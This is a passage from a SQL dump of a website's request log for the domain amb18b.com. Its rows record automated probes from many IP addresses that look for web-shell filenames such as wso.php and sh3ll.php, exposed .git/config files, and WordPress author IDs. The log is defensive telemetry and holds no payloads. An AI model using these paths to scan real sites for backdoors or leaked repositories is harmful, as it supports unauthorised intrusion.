15:56:41','2025-11-11 15:56:41'),(6071,'https://amb18b.com/bala.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:42','2025-11-11 15:56:42'),(6072,'https://amb18b.com/category.tokens.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:43','2025-11-11 15:56:43'),(6073,'https://amb18b.com/mari.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:44','2025-11-11 15:56:44'),(6074,'https://amb18b.com/json.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:46','2025-11-11 15:56:46'),(6075,'https://amb18b.com/new.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:49','2025-11-11 15:56:49'),(6076,'https://amb18b.com/woh.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:51','2025-11-11 15:56:51'),(6077,'https://amb18b.com/admin-ajax.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:52','2025-11-11 15:56:52'),(6078,'https://amb18b.com/wp_mna.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:53','2025-11-11 15:56:53'),(6079,'https://amb18b.com/dex.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:54','2025-11-11 15:56:54'),(6080,'https://amb18b.com/file5.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:55','2025-11-11 15:56:55'),(6081,'https://amb18b.com/flower.php','20.222.8.186','Direct Access',1,'2025-11-11 15:56:58','2025-11-11 15:56:58'),(6082,'https://amb18b.com/new/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:38','2025-11-11 18:06:38'),(6083,'https://amb18b.com/old/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:40','2025-11-11 18:06:40'),(6084,'https://amb18b.com/blog/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:41','2025-11-11 18:06:41'),(6085,'https://amb18b.com/wordpress/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:43','2025-11-11 18:06:43'),(6086,'https://amb18b.com/backup/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:44','2025-11-11 18:06:44'),(6087,'https://amb18b.com/wp/','35.236.81.22','Direct Access',1,'2025-11-11 18:06:46','2025-11-11 18:06:46'),(6088,'https://amb18b.com/.git/config','209.97.153.112','Direct Access',1,'2025-11-11 19:17:13','2025-11-11 19:17:13'),(6089,'https://amb18b.com/.git/config','209.97.153.112','Direct Access',1,'2025-11-11 19:17:18','2025-11-11 19:17:18'),(6090,'https://amb18b.com/.gitignore','2a14:7c1::2','Direct Access',1,'2025-11-11 19:23:38','2025-11-11 19:23:38'),(6091,'https://amb18b.com/about.php?key=EnigmaCyberSecurity','209.50.174.178','Direct Access',1,'2025-11-11 23:02:16','2025-11-11 23:02:16'),(6092,'https://amb18b.com/wp-admin/css/','37.60.246.231','Invalid Referrer',1,'2025-11-11 23:42:04','2025-11-11 23:42:04'),(6093,'https://amb18b.com/style.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:40','2025-11-12 04:54:40'),(6094,'https://amb18b.com/wp-admin/style.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:46','2025-11-12 04:54:46'),(6095,'https://amb18b.com/wp-includes/style.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:48','2025-11-12 04:54:48'),(6096,'https://amb18b.com/chosen.php?p=','94.156.152.43','Direct Access',1,'2025-11-12 04:54:50','2025-11-12 04:54:50'),(6097,'https://amb18b.com/file.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:52','2025-11-12 04:54:52'),(6098,'https://amb18b.com/flower.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:54','2025-11-12 04:54:54'),(6099,'https://amb18b.com/gifclass.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:56','2025-11-12 04:54:56'),(6100,'https://amb18b.com/bless.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:58','2025-11-12 04:54:58'),(6101,'https://amb18b.com/class-t.api.php','94.156.152.43','Direct Access',1,'2025-11-12 04:54:59','2025-11-12 04:54:59'),(6102,'https://amb18b.com/blurbs.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:02','2025-11-12 04:55:02'),(6103,'https://amb18b.com/akcc.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:04','2025-11-12 04:55:04'),(6104,'https://amb18b.com/abcd.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:05','2025-11-12 04:55:05'),(6105,'https://amb18b.com/aku.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:07','2025-11-12 04:55:07'),(6106,'https://amb18b.com/cord.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:09','2025-11-12 04:55:09'),(6107,'https://amb18b.com/dex.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:11','2025-11-12 04:55:11'),(6108,'https://amb18b.com/zoo.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:14','2025-11-12 04:55:14'),(6109,'https://amb18b.com//zwso.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:16','2025-11-12 04:55:16'),(6110,'https://amb18b.com/wp-admin/zwso.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:18','2025-11-12 04:55:18'),(6111,'https://amb18b.com/bolt.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:22','2025-11-12 04:55:22'),(6112,'https://amb18b.com/shlo.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:24','2025-11-12 04:55:24'),(6113,'https://amb18b.com/133.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:27','2025-11-12 04:55:27'),(6114,'https://amb18b.com/ahax.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:28','2025-11-12 04:55:28'),(6115,'https://amb18b.com/wpssl.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:30','2025-11-12 04:55:30'),(6116,'https://amb18b.com/witmm.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:33','2025-11-12 04:55:33'),(6117,'https://amb18b.com/wp-admin/css/index.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:35','2025-11-12 04:55:35'),(6118,'https://amb18b.com/files.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:37','2025-11-12 04:55:37'),(6119,'https://amb18b.com/wp-editor.php','94.156.152.43','Direct Access',1,'2025-11-12 04:55:39','2025-11-12 04:55:39'),(6120,'https://amb18b.com/about.php?key=EnigmaCyberSecurity','65.111.7.204','Direct Access',1,'2025-11-12 04:59:59','2025-11-12 04:59:59'),(6121,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-12 06:01:41','2025-11-12 06:01:41'),(6122,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-12 06:01:50','2025-11-12 06:01:50'),(6123,'https://amb18b.com/postnews.php','45.80.158.88','Direct Access',1,'2025-11-12 06:14:09','2025-11-12 06:14:09'),(6124,'https://amb18b.com/wp-admin/postnews.php','45.80.158.88','Direct Access',1,'2025-11-12 06:14:14','2025-11-12 06:14:14'),(6125,'https://amb18b.com//wp-includes/wlwmanifest.xml','18.209.61.178','Direct Access',1,'2025-11-12 11:05:09','2025-11-12 11:05:09'),(6126,'https://amb18b.com//?author=2','18.209.61.178','Direct Access',1,'2025-11-12 11:05:11','2025-11-12 11:05:11'),(6127,'https://amb18b.com/.git/config','167.172.29.196','Direct Access',1,'2025-11-12 13:00:45','2025-11-12 13:00:45'),(6128,'https://amb18b.com/.git/config','167.172.29.196','Direct Access',1,'2025-11-12 13:00:48','2025-11-12 13:00:48'),(6129,'https://amb18b.com/style.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:02','2025-11-12 13:26:02'),(6130,'https://amb18b.com/wp-admin/style.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:08','2025-11-12 13:26:08'),(6131,'https://amb18b.com/wp-includes/style.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:11','2025-11-12 13:26:11'),(6132,'https://amb18b.com/chosen.php?p=','103.186.30.186','Direct Access',1,'2025-11-12 13:26:14','2025-11-12 13:26:14'),(6133,'https://amb18b.com/file.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:18','2025-11-12 13:26:18'),(6134,'https://amb18b.com/flower.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:22','2025-11-12 13:26:22'),(6135,'https://amb18b.com/gifclass.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:24','2025-11-12 13:26:24'),(6136,'https://amb18b.com/bless.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:27','2025-11-12 13:26:27'),(6137,'https://amb18b.com/class-t.api.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:30','2025-11-12 13:26:30'),(6138,'https://amb18b.com/blurbs.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:32','2025-11-12 13:26:32'),(6139,'https://amb18b.com/akcc.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:36','2025-11-12 13:26:36'),(6140,'https://amb18b.com/abcd.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:38','2025-11-12 13:26:38'),(6141,'https://amb18b.com/aku.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:41','2025-11-12 13:26:41'),(6142,'https://amb18b.com/cord.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:47','2025-11-12 13:26:47'),(6143,'https://amb18b.com/dex.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:50','2025-11-12 13:26:50'),(6144,'https://amb18b.com/zoo.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:53','2025-11-12 13:26:53'),(6145,'https://amb18b.com//zwso.php','103.186.30.186','Direct Access',1,'2025-11-12 13:26:57','2025-11-12 13:26:57'),(6146,'https://amb18b.com/wp-admin/zwso.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:01','2025-11-12 13:27:01'),(6147,'https://amb18b.com/bolt.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:07','2025-11-12 13:27:07'),(6148,'https://amb18b.com/shlo.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:11','2025-11-12 13:27:11'),(6149,'https://amb18b.com/133.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:13','2025-11-12 13:27:13'),(6150,'https://amb18b.com/ahax.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:16','2025-11-12 13:27:16'),(6151,'https://amb18b.com/wpssl.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:18','2025-11-12 13:27:18'),(6152,'https://amb18b.com/witmm.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:20','2025-11-12 13:27:20'),(6153,'https://amb18b.com/wp-admin/css/index.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:22','2025-11-12 13:27:22'),(6154,'https://amb18b.com/files.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:24','2025-11-12 13:27:24'),(6155,'https://amb18b.com/wp-editor.php','103.186.30.186','Direct Access',1,'2025-11-12 13:27:26','2025-11-12 13:27:26'),(6156,'https://amb18b.com/?author=2','161.118.166.167','Direct Access',1,'2025-11-12 13:41:35','2025-11-12 13:41:35'),(6157,'https://amb18b.com/?author=3','161.118.166.167','Direct Access',1,'2025-11-12 13:41:36','2025-11-12 13:41:36'),(6158,'https://amb18b.com/?author=4','161.118.166.167','Direct Access',1,'2025-11-12 13:41:38','2025-11-12 13:41:38'),(6159,'https://amb18b.com/?author=5','161.118.166.167','Direct Access',1,'2025-11-12 13:41:39','2025-11-12 13:41:39'),(6160,'https://amb18b.com/error.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:46','2025-11-12 13:54:46'),(6161,'https://amb18b.com/x.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:47','2025-11-12 13:54:47'),(6162,'https://amb18b.com/xx.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:48','2025-11-12 13:54:48'),(6163,'https://amb18b.com/222.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:50','2025-11-12 13:54:50'),(6164,'https://amb18b.com/444.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:51','2025-11-12 13:54:51'),(6165,'https://amb18b.com/file9.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:52','2025-11-12 13:54:52'),(6166,'https://amb18b.com/filesss.php','48.210.57.6','Direct Access',2,'2025-11-12 13:56:22','2025-11-12 13:54:53'),(6167,'https://amb18b.com/file88.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:54','2025-11-12 13:54:54'),(6168,'https://amb18b.com/gifclass4.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:55','2025-11-12 13:54:55'),(6169,'https://amb18b.com/class19.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:56','2025-11-12 13:54:56'),(6170,'https://amb18b.com/2clas.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:57','2025-11-12 13:54:57'),(6171,'https://amb18b.com/bless5.php','48.210.57.6','Direct Access',1,'2025-11-12 13:54:59','2025-11-12 13:54:59'),(6172,'https://amb18b.com/file15.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:00','2025-11-12 13:55:00'),(6173,'https://amb18b.com/333.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:01','2025-11-12 13:55:01'),(6174,'https://amb18b.com/alpa.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:02','2025-11-12 13:55:02'),(6175,'https://amb18b.com/file21.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:03','2025-11-12 13:55:03'),(6176,'https://amb18b.com/ut.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:04','2025-11-12 13:55:04'),(6177,'https://amb18b.com/inde.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:05','2025-11-12 13:55:05'),(6178,'https://amb18b.com/classgoto24.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:06','2025-11-12 13:55:06'),(6179,'https://amb18b.com/thh.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:07','2025-11-12 13:55:07'),(6180,'https://amb18b.com/fffff.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:08','2025-11-12 13:55:08'),(6181,'https://amb18b.com/indo.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:10','2025-11-12 13:55:10'),(6182,'https://amb18b.com/fileas.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:11','2025-11-12 13:55:11'),(6183,'https://amb18b.com/yellow.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:12','2025-11-12 13:55:12'),(6184,'https://amb18b.com/wfile.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:13','2025-11-12 13:55:13'),(6185,'https://amb18b.com/class20.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:14','2025-11-12 13:55:14'),(6186,'https://amb18b.com/build.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:16','2025-11-12 13:55:16'),(6187,'https://amb18b.com/1.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:17','2025-11-12 13:55:17'),(6188,'https://amb18b.com/usep.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:18','2025-11-12 13:55:18'),(6189,'https://amb18b.com/wa.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:19','2025-11-12 13:55:19'),(6190,'https://amb18b.com/wb.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:20','2025-11-12 13:55:20'),(6191,'https://amb18b.com/file1.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:22','2025-11-12 13:55:22'),(6192,'https://amb18b.com/gmo.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:24','2025-11-12 13:55:24'),(6193,'https://amb18b.com/info.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:25','2025-11-12 13:55:25'),(6194,'https://amb18b.com/file2.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:27','2025-11-12 13:55:27'),(6195,'https://amb18b.com/lv.php','48.210.57.6','Direct Access',2,'2025-11-12 13:56:35','2025-11-12 13:55:28'),(6196,'https://amb18b.com/about.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:29','2025-11-12 13:55:29'),(6197,'https://amb18b.com/abcd.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:31','2025-11-12 13:55:31'),(6198,'https://amb18b.com/lock360.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:32','2025-11-12 13:55:32'),(6199,'https://amb18b.com/pp.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:33','2025-11-12 13:55:33'),(6200,'https://amb18b.com/geck.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:34','2025-11-12 13:55:34'),(6201,'https://amb18b.com/gm.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:35','2025-11-12 13:55:35'),(6202,'https://amb18b.com/file4.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:36','2025-11-12 13:55:36'),(6203,'https://amb18b.com/520.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:37','2025-11-12 13:55:37'),(6204,'https://amb18b.com/file18.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:38','2025-11-12 13:55:38'),(6205,'https://amb18b.com/ffile.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:40','2025-11-12 13:55:40'),(6206,'https://amb18b.com/file7.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:41','2025-11-12 13:55:41'),(6207,'https://amb18b.com/aaa.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:42','2025-11-12 13:55:42'),(6208,'https://amb18b.com/vee.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:43','2025-11-12 13:55:43'),(6209,'https://amb18b.com/efile.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:45','2025-11-12 13:55:45'),(6210,'https://amb18b.com/afile.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:46','2025-11-12 13:55:46'),(6211,'https://amb18b.com/f35.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:47','2025-11-12 13:55:47'),(6212,'https://amb18b.com/goods.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:49','2025-11-12 13:55:49'),(6213,'https://amb18b.com/enclas.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:50','2025-11-12 13:55:50'),(6214,'https://amb18b.com/ioxi-o.php','48.210.57.6','Direct Access',2,'2025-11-12 13:56:26','2025-11-12 13:55:51'),(6215,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','48.210.57.6','Direct Access',1,'2025-11-12 13:55:52','2025-11-12 13:55:52'),(6216,'https://amb18b.com/classwithtostring.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:54','2025-11-12 13:55:54'),(6217,'https://amb18b.com/image.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:55','2025-11-12 13:55:55'),(6218,'https://amb18b.com/wp-admin/wp-conflg.php?p=','48.210.57.6','Direct Access',1,'2025-11-12 13:55:56','2025-11-12 13:55:56'),(6219,'https://amb18b.com/wp-freya.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:57','2025-11-12 13:55:57'),(6220,'https://amb18b.com/X7x.php','48.210.57.6','Direct Access',1,'2025-11-12 13:55:59','2025-11-12 13:55:59'),(6221,'https://amb18b.com/admir.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:00','2025-11-12 13:56:00'),(6222,'https://amb18b.com/file52.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:01','2025-11-12 13:56:01'),(6223,'https://amb18b.com/zde.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:02','2025-11-12 13:56:02'),(6224,'https://amb18b.com/wpo.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:04','2025-11-12 13:56:04'),(6225,'https://amb18b.com/aj.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:05','2025-11-12 13:56:05'),(6226,'https://amb18b.com/opts.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:06','2025-11-12 13:56:06'),(6227,'https://amb18b.com/filer.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:07','2025-11-12 13:56:07'),(6228,'https://amb18b.com/lites.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:09','2025-11-12 13:56:09'),(6229,'https://amb18b.com/0x.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:10','2025-11-12 13:56:10'),(6230,'https://amb18b.com/bless3.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:11','2025-11-12 13:56:11'),(6231,'https://amb18b.com/wsd.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:12','2025-11-12 13:56:12'),(6232,'https://amb18b.com/f6.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:13','2025-11-12 13:56:13'),(6233,'https://amb18b.com/he.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:14','2025-11-12 13:56:14'),(6234,'https://amb18b.com/aves.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:16','2025-11-12 13:56:16'),(6235,'https://amb18b.com/.well-known/acme-challenge/about.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:17','2025-11-12 13:56:17'),(6236,'https://amb18b.com/gorila.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:18','2025-11-12 13:56:18'),(6237,'https://amb18b.com/vanta.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:19','2025-11-12 13:56:19'),(6238,'https://amb18b.com/sh3ll.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:20','2025-11-12 13:56:20'),(6239,'https://amb18b.com/cabs.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:21','2025-11-12 13:56:21'),(6240,'https://amb18b.com/wp-aaa.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:23','2025-11-12 13:56:23'),(6241,'https://amb18b.com/css.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:25','2025-11-12 13:56:25'),(6242,'https://amb18b.com/classwithtostring.php?p=','48.210.57.6','Direct Access',1,'2025-11-12 13:56:27','2025-11-12 13:56:27'),(6243,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:28','2025-11-12 13:56:28'),(6244,'https://amb18b.com/fm.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:30','2025-11-12 13:56:30'),(6245,'https://amb18b.com/403.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:32','2025-11-12 13:56:32'),(6246,'https://amb18b.com/admin.php','48.210.57.6','Direct Access',1,'2025-11-12 13:56:33','2025-11-12 13:56:33'),(6247,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-11-12 19:14:22','2025-11-12 19:14:22'),(6248,'https://amb18b.com/shoha.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:49','2025-11-12 19:47:49'),(6249,'https://amb18b.com/ze.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:50','2025-11-12 19:47:50'),(6250,'https://amb18b.com/xo.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:51','2025-11-12 19:47:51'),(6251,'https://amb18b.com/wp-the1me.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:53','2025-11-12 19:47:53'),(6252,'https://amb18b.com/m.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:54','2025-11-12 19:47:54'),(6253,'https://amb18b.com/e.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:55','2025-11-12 19:47:55'),(6254,'https://amb18b.com/dd1.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:56','2025-11-12 19:47:56'),(6255,'https://amb18b.com/conn.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:57','2025-11-12 19:47:57'),(6256,'https://amb18b.com/card.php','20.196.107.56','Direct Access',1,'2025-11-12 19:47:59','2025-11-12 19:47:59'),(6257,'https://amb18b.com/asas.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:00','2025-11-12 19:48:00'),(6258,'https://amb18b.com/kki.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:01','2025-11-12 19:48:01'),(6259,'https://amb18b.com/js.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:02','2025-11-12 19:48:02'),(6260,'https://amb18b.com/view.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:04','2025-11-12 19:48:04'),(6261,'https://amb18b.com/wso.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:05','2025-11-12 19:48:05'),(6262,'https://amb18b.com/sid3.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:06','2025-11-12 19:48:06'),(6263,'https://amb18b.com/mans.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:08','2025-11-12 19:48:08'),(6264,'https://amb18b.com/111.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:09','2025-11-12 19:48:09'),(6265,'https://amb18b.com/403.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:10','2025-11-12 19:48:10'),(6266,'https://amb18b.com/4yps5d.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:11','2025-11-12 19:48:11'),(6267,'https://amb18b.com/f6.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:13','2025-11-12 19:48:13'),(6268,'https://amb18b.com/fs6.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:14','2025-11-12 19:48:14'),(6269,'https://amb18b.com/lv.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:15','2025-11-12 19:48:15'),(6270,'https://amb18b.com/habhan.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:17','2025-11-12 19:48:17'),(6271,'https://amb18b.com/akcc.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:18','2025-11-12 19:48:18'),(6272,'https://amb18b.com/bi1f.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:20','2025-11-12 19:48:20'),(6273,'https://amb18b.com/lib.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:22','2025-11-12 19:48:22'),(6274,'https://amb18b.com/luxe.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:23','2025-11-12 19:48:23'),(6275,'https://amb18b.com/wsd.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:24','2025-11-12 19:48:24'),(6276,'https://amb18b.com/404.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:25','2025-11-12 19:48:25'),(6277,'https://amb18b.com/an7.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:27','2025-11-12 19:48:27'),(6278,'https://amb18b.com/fs7.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:28','2025-11-12 19:48:28'),(6279,'https://amb18b.com/new4.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:29','2025-11-12 19:48:29'),(6280,'https://amb18b.com/icon.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:31','2025-11-12 19:48:31'),(6281,'https://amb18b.com/blox.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:32','2025-11-12 19:48:32'),(6282,'https://amb18b.com/gm.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:33','2025-11-12 19:48:33'),(6283,'https://amb18b.com/iko.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:35','2025-11-12 19:48:35'),(6284,'https://amb18b.com/miso.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:36','2025-11-12 19:48:36'),(6285,'https://amb18b.com/moie.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:37','2025-11-12 19:48:37'),(6286,'https://amb18b.com/shelp.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:38','2025-11-12 19:48:38'),(6287,'https://amb18b.com/siln.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:40','2025-11-12 19:48:40'),(6288,'https://amb18b.com/sko.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:41','2025-11-12 19:48:41'),(6289,'https://amb18b.com/3.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:42','2025-11-12 19:48:42'),(6290,'https://amb18b.com/wp-gif.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:43','2025-11-12 19:48:43'),(6291,'https://amb18b.com/wp-good.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:44','2025-11-12 19:48:44'),(6292,'https://amb18b.com/rrr.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:45','2025-11-12 19:48:45'),(6293,'https://amb18b.com/rxzx.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:47','2025-11-12 19:48:47'),(6294,'https://amb18b.com/tj.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:49','2025-11-12 19:48:49'),(6295,'https://amb18b.com/vansec.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:50','2025-11-12 19:48:50'),(6296,'https://amb18b.com/filesss.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:51','2025-11-12 19:48:51'),(6297,'https://amb18b.com/ss.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:52','2025-11-12 19:48:52'),(6298,'https://amb18b.com/wp-is.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:54','2025-11-12 19:48:54'),(6299,'https://amb18b.com/jmfi2.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:56','2025-11-12 19:48:56'),(6300,'https://amb18b.com/scx.php7','20.196.107.56','Direct Access',1,'2025-11-12 19:48:57','2025-11-12 19:48:57'),(6301,'https://amb18b.com/777.php','20.196.107.56','Direct Access',1,'2025-11-12 19:48:58','2025-11-12 19:48:58'),(6302,'https://amb18b.com/f35.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:00','2025-11-12 19:49:00'),(6303,'https://amb18b.com/ioxi-o.php','20.196.107.56','Direct Access',1,'2025-11-12 19:49:01','2025-11-12 